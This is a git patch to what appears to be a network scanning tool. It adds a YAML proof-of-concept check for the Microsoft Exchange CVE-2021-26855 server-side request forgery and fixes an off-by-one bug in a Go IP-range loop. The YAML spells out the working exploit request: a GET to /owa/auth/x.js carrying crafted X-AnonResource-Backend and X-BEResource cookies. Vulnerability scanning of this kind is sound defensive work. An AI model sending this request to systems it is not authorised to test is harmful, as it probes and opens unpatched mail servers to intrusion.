From f4b6ecc36316a49014d380be6423ae9a090be9f9 Mon Sep 17 00:00:00 2001 From: shadow1ng Date: Wed, 31 Mar 2021 17:03:33 +0800 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0exchange=5Fssrf=5Fpoc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- WebScan/pocs/exchange-cve-2021-26855-ssrf.yml | 14 ++++++++++++++ common/ParseIP.go | 2 +- 2 files changed, 15 insertions(+), 1 deletion(-) create mode 100644 WebScan/pocs/exchange-cve-2021-26855-ssrf.yml diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml new file mode 100644 index 0000000..6b80262 --- /dev/null +++ b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml @@ -0,0 +1,14 @@ +name: poc-yaml-exchange-cve-2021-26855-ssrf +rules: + - method: GET + path: /owa/auth/x.js + headers: + Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + follow_redirects: false + expression: | + response.headers["X-CalculatedBETarget"].icontains("localhost") +detail: + author: sharecast + Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010" + links: + - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse \ No newline at end of file diff --git a/common/ParseIP.go b/common/ParseIP.go index 4716ed2..5ae5649 100644 --- a/common/ParseIP.go +++ b/common/ParseIP.go @@ -131,7 +131,7 @@ func ParseIPC(ip string) ([]string, error) { } startNum := start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3] endNum := end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3] - for num := startNum; num < endNum; num++ { + for num := startNum; num <= endNum; num++ { ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff) AllIP = append(AllIP, ip) }